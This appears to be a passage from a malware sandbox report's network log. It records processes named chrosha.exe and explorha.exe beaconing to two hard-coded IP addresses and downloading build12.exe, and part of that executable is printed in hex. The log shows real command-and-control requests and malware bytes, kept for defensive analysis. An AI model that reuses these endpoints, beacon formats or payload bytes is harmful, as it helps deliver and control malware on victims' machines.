                                                                                                                                                                                                                                      Data Ascii: H(A HnH HH(H(A HnH HLH(H(AHnHs HH(oH(A H_nHC HH(?H(AHWnH HH(
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:04.155153036 CEST1289INData Raw: 83 c4 28 e9 ef ed 0c 00 cc cc cc 48 83 ec 28 41 b8 0c 00 00 00 48 8d 15 4f 6c 11 00 48 8d 0d b0 b5 12 00 e8 c3 1b 0c 00 48 8d 0d cc 8b 0f 00 48 83 c4 28 e9 bf ed 0c 00 cc cc cc 48 83 ec 28 41 b8 0c 00 00 00 48 8d 15 2f 6c 11 00 48 8d 0d c0 bd 12
                                                                                                                                                                                                                                      Data Ascii: (H(AHOlHHH(H(AH/lHHH(H(A(HlHcHLH(_H(AHlH3HH(/H(AHkHHH(
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:04.155193090 CEST1289INData Raw: 8d 0d 4c 92 0f 00 48 83 c4 28 e9 df e8 0c 00 cc cc cc 48 83 ec 28 41 b8 0c 00 00 00 48 8d 15 57 69 11 00 48 8d 0d a0 b7 12 00 e8 b3 16 0c 00 48 8d 0d 8c 92 0f 00 48 83 c4 28 e9 af e8 0c 00 cc cc cc 48 83 ec 28 41 b8 04 00 00 00 48 8d 15 37 69 11
                                                                                                                                                                                                                                      Data Ascii: LH(H(AHWiHHH(H(AH7iHHH(H(AHiHSHH(OH(AHhH#HLH(H(AHhH`H
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:04.155234098 CEST1289INData Raw: 00 e8 d3 11 0c 00 48 8d 0d 0c 99 0f 00 48 83 c4 28 e9 cf e3 0c 00 cc cc cc 48 83 ec 28 41 b8 34 00 00 00 48 8d 15 cf 67 11 00 48 8d 0d b0 b8 12 00 e8 a3 11 0c 00 48 8d 0d 4c 99 0f 00 48 83 c4 28 e9 9f e3 0c 00 cc cc cc 48 83 ec 28 41 b8 28 00 00
                                                                                                                                                                                                                                      Data Ascii: HH(H(A4HgHHLH(H(A(HgHsHH(oH(AHgHCHH(?H(A4HgHHH(H(A(HgH
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:04.155271053 CEST1289INData Raw: c7 80 80 00 00 00 0f 00 00 00 88 50 68 48 89 90 98 00 00 00 48 c7 80 a0 00 00 00 0f 00 00 00 88 90 88 00 00 00 48 89 90 b8 00 00 00 48 c7 80 c0 00 00 00 0f 00 00 00 88 90 a8 00 00 00 48 89 90 d8 00 00 00 48 c7 80 e0 00 00 00 0f 00 00 00 88 90 c8
                                                                                                                                                                                                                                      Data Ascii: PhHHHHHHHHHH H8H@(HXH`HHxHhHHHH
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:04.155311108 CEST1289INData Raw: 00 00 0f 00 00 00 88 90 c8 00 00 00 48 89 90 f8 00 00 00 48 c7 80 00 01 00 00 0f 00 00 00 88 90 e8 00 00 00 48 89 90 18 01 00 00 48 c7 80 20 01 00 00 0f 00 00 00 88 90 08 01 00 00 48 89 90 38 01 00 00 48 c7 80 40 01 00 00 0f 00 00 00 88 90 28 01
                                                                                                                                                                                                                                      Data Ascii: HHHH H8H@(HXH`HHxHhHHHHHHHHHH
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:04.155349016 CEST1289INData Raw: 00 0f 00 00 00 88 90 28 01 00 00 48 89 90 58 01 00 00 48 c7 80 60 01 00 00 0f 00 00 00 88 90 48 01 00 00 48 89 90 78 01 00 00 48 c7 80 80 01 00 00 0f 00 00 00 88 90 68 01 00 00 48 89 90 98 01 00 00 48 c7 80 a0 01 00 00 0f 00 00 00 88 90 88 01 00
                                                                                                                                                                                                                                      Data Ascii: (HXH`HHxHhHHHHHHHHHH H8H@(HXH`HHxH
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:04.155386925 CEST1289INData Raw: 00 48 8d 0d c5 9a 0f 00 e9 b4 cf 0c 00 48 8d 0d 15 9b 0f 00 e9 a8 cf 0c 00 48 8d 0d 49 9b 0f 00 e9 9c cf 0c 00 48 83 ec 28 48 8d 0d 75 b8 12 00 e8 ac dc 0c 00 48 8d 0d 75 9b 0f 00 48 83 c4 28 e9 7c cf 0c 00 b8 01 00 00 00 c3 cc cc cc cc cc cc cc
                                                                                                                                                                                                                                      Data Ascii: HHHIH(HuHuH(|H\$Hl$Ht$ WAVHLTAL5GL@AAt'AB0TB82TuIIEAExAB0TAB0T+uHE3LHuED8t
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:04.155425072 CEST1289INData Raw: 8b 57 10 48 8b cb e8 41 b8 06 00 48 8b 3f 48 85 ff 75 ec 48 8b 7e 10 48 85 ff 74 14 48 8b 57 10 48 8b cb e8 74 38 04 00 48 8b 3f 48 85 ff 75 ec 8b 43 28 41 ff c7 48 83 c5 20 44 3b f8 0f 8c 49 ff ff ff 48 8b 6c 24 20 4c 89 b3 20 03 00 00 41 8b fe
                                                                                                                                                                                                                                      Data Ascii: WHAH?HuH~HtHWHt8H?HuC(AH D;IHl$ L A~0IHC HL0HtD8qtiuUH ;{(|HL$(D$0DuH{HL$0H AD$0HtgfDHHE^L9 tHH1-3H;hr"H;psH`
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:04.396878958 CEST1289INData Raw: 95 c0 88 46 2b 33 c0 eb 05 b8 01 00 00 00 48 8b 4c 24 78 48 33 cc e8 28 bf 0c 00 4c 8d 9c 24 80 00 00 00 49 8b 5b 20 49 8b 6b 30 49 8b e3 41 5e 5f 5e c3 48 83 ec 08 80 79 2a 00 4c 8b d9 0f 85 2e 01 00 00 80 79 28 00 48 89 1c 24 74 0c 8b 41 08 44
                                                                                                                                                                                                                                      Data Ascii: F+3HL$xH3(L$I[ Ik0IA^_^Hy*L.y(H$tADIYAAD@AC*AAIDOQADAADhAAOiQQDAADAlDiAAAA+


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      55192.168.2.549869193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:03.929011106 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:04.177756071 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:04 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:04.178675890 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:04.436794043 CEST381INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:04 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 62 66 0d 0a 20 3c 63 3e 31 30 30 30 31 38 37 30 30 31 2b 2b 2b 39 37 32 38 39 64 30 33 35 31 36 65 39 34 31 64 33 61 66 61 64 61 66 65 62 66 39 34 32 35 66 63 64 65 36 61 34 65 66 64 61 61 36 32 32 37 35 38 38 38 63 35 61 64 35 66 30 63 61 63 37 35 62 62 30 35 37 33 35 33 64 30 30 39 66 63 66 37 23 31 30 30 30 31 38 38 30 30 31 2b 2b 2b 39 37 32 38 39 64 30 33 35 31 36 65 39 34 31 64 33 61 66 61 64 61 66 65 62 66 39 34 32 35 66 63 64 65 36 61 34 65 66 64 61 61 36 32 32 37 35 38 38 38 63 35 61 64 35 66 30 63 61 63 37 35 62 62 30 35 37 33 35 33 64 30 30 39 66 63 66 37 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: bf <c>1000187001+++97289d03516e941d3afadafebf9425fcde6a4efdaa62275888c5ad5f0cac75bb057353d009fcf7#1000188001+++97289d03516e941d3afadafebf9425fcde6a4efdaa62275888c5ad5f0cac75bb057353d009fcf7#<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:04.437968016 CEST57OUTGET /lend/build12.exe HTTP/1.1
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:04.686192989 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:04 GMT
                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                      Content-Length: 97792
                                                                                                                                                                                                                                      Last-Modified: Fri, 19 Apr 2024 00:20:52 GMT
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      ETag: "6621b8e4-17e00"
                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a2 a9 0c f0 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 74 01 00 00 08 00 00 00 00 00 00 4e 93 01 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 01 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 93 01 00 4b 00 00 00 00 a0 01 00 de 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 73 01 00 00 20 00 00 00 74 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 de 04 00 00 00 a0 01 00 00 06 00 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 01 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 93 01 00 00 00 00 00 48 00 00 00 02 00 05 00 b4 af 00 00 4c e3 00 00 03 00 00 00 43 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 09 00 20 03 00 00 01 00 00 11 73 01 00 00 0a 0a 02 7e 03 00 00 04 25 2d 17 26 7e 02 00 00 04 fe 06 10 00 00 06 73 02 00 00 0a 25 80 03 00 00 04 28 01 00 00 2b 6f 04 00 00 0a 0b 38 cc 02 00 00 07 6f 05 00 00 0a 17 17 19 8d 08 00 00 01 25 16 1f 0a 8d 09 00 00 01 25 d0 0a 01 00 04 28 06 00 00 0a 73 07 00 00 0a a2 25 17 1e 8d 09 00 00 01 25 d0 02 01 00 04 28 06 00 00 0a 73 07 00 00 0a a2 25 18 1d 8d 09 00 00 01 25 d0 07 01 00 04 28 06 00 00 0a 73 07 00 00 0a a2 28 01 01 00 06 6f 08 00 00 0a 0c 38 46 02 00 00 12 02 28 09 00 00 0a 0d 73 09 00 00 06 13 04 73 2c 01 00 06 13 05 11 04 7e 0a 00 00 0a 7d 01 00 00 04 7e 0a 00 00 0a 13 06 11 04 09 73 0b 00 00 0a 28 0c 00 00 0a 6f 0d 00 00 0a 7d 01 00 00 04 11 04 7b 01 00 00 04 1f 0f 8d 09 00 00 01 25 d0 12 01 00 04 28 06 00 00 0a 73 07 00 00 0a 6f 0e 00 00 0a 2c 1a 1e 8d 09 00 00 01 25 d0 fd 00 00 04 28 06 00 00 0a 73 07 00 00 0a 13 06 2b 4f 09 1f 3e 8d 09 00 00 01 25 d0 ca 00 00 04 28 06 00 00 0a 73 07 00 00 0a 72 01 00 00 70 7e 0a 00 00 0a 28 0f 00 00 0a 28 10 00 00 0a 6f 0e 00 00 0a 2d 0e 11 04 7b 01 00 00 04 28 04 01 00 06 2b 0c 11 04 7b 01 00 00 04 28 03 01 00 06 13 06 11 06 28 11 00 00 0a 3a 56 01 00 00 11 06 16 6f 12 00 00 0a 13 08 12 08 28 13 00 00 0a 6f 14 00 00 0a 11 06 16 17 6f 15 00 00 0a 28 16 00 00 0a 13 06 11 04 7b
                                                                                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL0tN @ @K H.textTs t `.rsrcv@@.reloc|@B0HLC0 s~%-&~s%(+o8o%%(s%%(s%%(s(o8F(ss,~}~s(o}{%(so,%(s+O>%(srp~((o-{(+{((:Vo(oo({
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:04.686230898 CEST1289INData Raw: 01 00 00 04 28 02 01 00 06 13 07 11 07 28 11 00 00 0a 3a 16 01 00 00 11 06 1f 5c 28 02 00 00 2b 2c 19 11 06 17 8d 09 00 00 01 25 16 1f 5c 9d 6f 18 00 00 0a 28 03 00 00 2b 13 06 11 05 11 06 6f 20 01 00 06 11 05 11 07 6f 22 01 00 06 11 05 11 04 fe
                                                                                                                                                                                                                                      Data Ascii: ((:\(+,%\o(+o o"s~%-&~s%(+o$s~%-&~s%(+o*s~%-&~s%(+o&
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:04.686331034 CEST1289INData Raw: d0 08 01 00 04 28 06 00 00 0a 73 07 00 00 0a 6f ac 00 00 06 72 2d 00 00 70 6f 0e 00 00 0a 6f 34 01 00 06 11 08 11 05 11 06 1f 0b 8d 09 00 00 01 25 d0 f1 00 00 04 28 06 00 00 0a 73 07 00 00 0a 6f ac 00 00 06 6f 29 00 00 0a 28 2f 00 00 0a 20 40 42
                                                                                                                                                                                                                                      Data Ascii: (sor-poo4%(soo)(/ @Bj[!Yo6%(soo)o8%(so(o:o5j/*(0(1(2!Yo6
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:04.686369896 CEST1289INData Raw: 6f 38 00 00 0a 11 06 17 58 13 06 11 06 11 05 6f aa 00 00 06 3f e1 fe ff ff de 03 26 de 00 de 0c 11 04 2c 07 11 04 6f 24 00 00 0a dc de 03 26 de 00 06 2a 09 2a 00 00 41 64 00 00 00 00 00 00 76 00 00 00 f9 00 00 00 6f 01 00 00 03 00 00 00 01 00 00
                                                                                                                                                                                                                                      Data Ascii: o8Xo?&,o$&**Advo@T@Y0@~ov3o13(9()+(2o)&*5;
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:04.686451912 CEST1289INData Raw: 6f 24 00 00 0a dc de 64 26 de 61 06 06 6f 45 01 00 06 28 11 00 00 0a 2d 08 06 6f 45 01 00 06 2b 05 72 19 00 00 70 6f 46 01 00 06 06 06 6f 47 01 00 06 28 11 00 00 0a 2d 08 06 6f 47 01 00 06 2b 05 72 19 00 00 70 6f 48 01 00 06 06 06 6f 49 01 00 06
                                                                                                                                                                                                                                      Data Ascii: o$d&aoE(-oE+rpoFoG(-oG+rpoHoI(-oI+rpoJ*(a0s~%-&~s%(+o85o%%
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:04.686496973 CEST1289INData Raw: 10 00 00 0a 7e 0a 00 00 0a 6f 0f 00 00 0a 10 00 02 17 8d 09 00 00 01 25 16 1f 5c 9d 17 6f 5c 00 00 0a 0b 07 18 9a 1e 8d 09 00 00 01 25 d0 c7 00 00 04 28 06 00 00 0a 73 07 00 00 0a 28 53 00 00 0a 2c 06 07 17 9a 0a 2b 04 07 16 9a 0a de 03 26 de 00
                                                                                                                                                                                                                                      Data Ascii: ~o%\o\%(s(S,+&*hn0s~%(s(~o%\o\%(s(S,+&*hn
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:04.686568975 CEST1289INData Raw: 02 00 30 00 6d 9d 00 0e 00 00 00 00 13 30 05 00 32 00 00 00 13 00 00 11 02 03 72 23 02 00 70 28 2f 00 00 06 0a 1a 8d 25 00 00 01 25 16 06 1a 91 9c 25 17 06 1b 91 9c 25 18 06 1c 91 9c 25 19 06 1d 91 9c 16 28 67 00 00 0a 2a 00 00 13 30 05 00 3e 00
                                                                                                                                                                                                                                      Data Ascii: 0m02r#p(/%%%%%(g*0>~h(",sez(iodr?pi(%,sez*0rYp(/(g(j% KDBM(k%(k%i(k%(0~h
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:04.686615944 CEST1289INData Raw: 0a de 05 26 16 0a de 00 06 2a 00 01 10 00 00 00 00 00 00 10 10 00 05 14 00 00 01 1b 30 03 00 20 00 00 00 1b 00 00 11 04 02 7b 0a 00 00 04 03 6f 18 01 00 06 51 17 0a de 0c 26 04 73 7f 00 00 0a 51 16 0a de 00 06 2a 01 10 00 00 00 00 00 00 12 12 00
                                                                                                                                                                                                                                      Data Ascii: &*0 {oQ&sQ*0{o&*:oB(*,3{,+{u:%-&+o{u:%-&*o*.sH(D*0sF
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:04.686686039 CEST1289INData Raw: 2e 00 8c ba 00 03 01 00 00 01 02 00 20 00 ab cb 00 0c 00 00 00 00 00 00 13 00 c6 d9 00 03 01 00 00 01 00 00 06 00 e5 eb 00 03 01 00 00 01 1b 30 04 00 c4 01 00 00 1f 00 00 11 73 95 00 00 0a 0c 08 1f 09 8d 09 00 00 01 25 d0 e0 00 00 04 28 06 00 00
                                                                                                                                                                                                                                      Data Ascii: . 0s%(so%(so%(so%(sos,,1*(8o+(
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:04.686732054 CEST1289INData Raw: 00 89 00 00 00 68 01 00 00 03 00 00 00 01 00 00 01 02 00 00 00 d1 00 00 00 a8 00 00 00 79 01 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 ba 00 00 00 cd 00 00 00 87 01 00 00 03 00 00 00 01 00 00 01 00 00 00 00 c5 01 00 00 89 00 00 00 4e 02 00 00 03
                                                                                                                                                                                                                                      Data Ascii: hyN_Tmp}0I!s%(so%
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:04.934964895 CEST1289INData Raw: 00 00 0a 0b 06 73 0f 01 00 06 25 07 6f 0a 01 00 06 25 72 b4 04 00 70 6f 0c 01 00 06 25 16 6f 0e 01 00 06 6f a4 00 00 0a de 03 26 de 00 06 2a 00 01 10 00 00 00 00 06 00 38 3e 00 03 01 00 00 01 4a 02 28 14 01 00 06 02 72 c6 04 00 70 28 11 01 00 06
                                                                                                                                                                                                                                      Data Ascii: s%o%rpo%oo&*8>J(rp(*oo(Grp(rpo*0C#s(Grp(s%o%rpo%oo&*8>0*$%-&s


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      56192.168.2.549871193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:04.130027056 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:04.373619080 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:04 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:04.376370907 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:04.624084949 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:04 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      57192.168.2.549873193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:04.984601974 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:05.230546951 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:05 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      58192.168.2.549877193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:05.485228062 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:05.742712975 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:05 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      59192.168.2.549879193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:06.107033014 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:06.355609894 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:06 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
